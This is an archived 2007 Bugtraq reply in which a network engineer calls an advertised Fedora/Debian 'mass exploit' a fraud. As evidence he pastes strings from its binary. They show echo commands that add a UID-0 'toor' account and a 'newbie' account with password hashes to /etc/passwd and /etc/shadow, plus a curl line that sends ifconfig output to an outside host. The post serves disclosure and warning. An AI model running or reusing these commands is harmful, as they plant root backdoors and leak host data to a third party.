| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 28 Aug 2007 11:24:15 -0400 (EDT) From: Jon Lewis <jlewis@...is.org> To: linux0day@...oo.co.uk Cc: bugtraq@...urityfocus.com Subject: Re: Found nice mass exploits for fedora and imap On Mon, 28 Aug 2007 linux0day@...oo.co.uk wrote: > Hello bugtraq, > Did somebody realize a new mass exploits is realeased to public, it's seems work for fedora core 5, 6 and debian 3.1 with exploiting apache and imap. > > I've found this link somedays ago in a security forum, check this out > > http://rufy.com/images/mass/ Looks like a fraud to me. Nice try. ^M^@...he^@...P4rev1^@^@^@^@...t priviledge is needed - use your root user OK! ^@r^@...get.txt^@^@^@^@...ame your target list filename to target.txt^@...c/shadow^@^@...bie:$1$nLv4Q0aJ$rV4IkBgFH1NMo/HzHX35u/^@^@^@...o toor:\$1\$nLv4Q0aJ\$rV4IkBgFH1NMo\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow^@^@^@^@...o newbie:\$1\$nLv4Q0aJ\$rV4IkBgFH1NMo\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow^@^@...o toor:x:0:0:toor:/var:/bin/sh >> /etc/passwd^@^@^@^@...o newbie:x:10000:65534:toor:/var/tmp:/bin/sh >> /etc/passwd^@...r/bin/curl^@^@^@^@...r/bin/curl -d "user=newbie&pass=novice&target=$(ifconfig -a)" http://www.trancefix.org/hell/save.php > /dev/null 2&>/dev/null^@^@^@^@...ing to connect to %s port %d ---------------------------------------------------------------------- Jon Lewis | I route Senior Network Engineer | therefore you are Atlantic Net | _________ http://www.lewis.org/~jlewis/pgp for PGP public key_________
Powered by blists - more mailing lists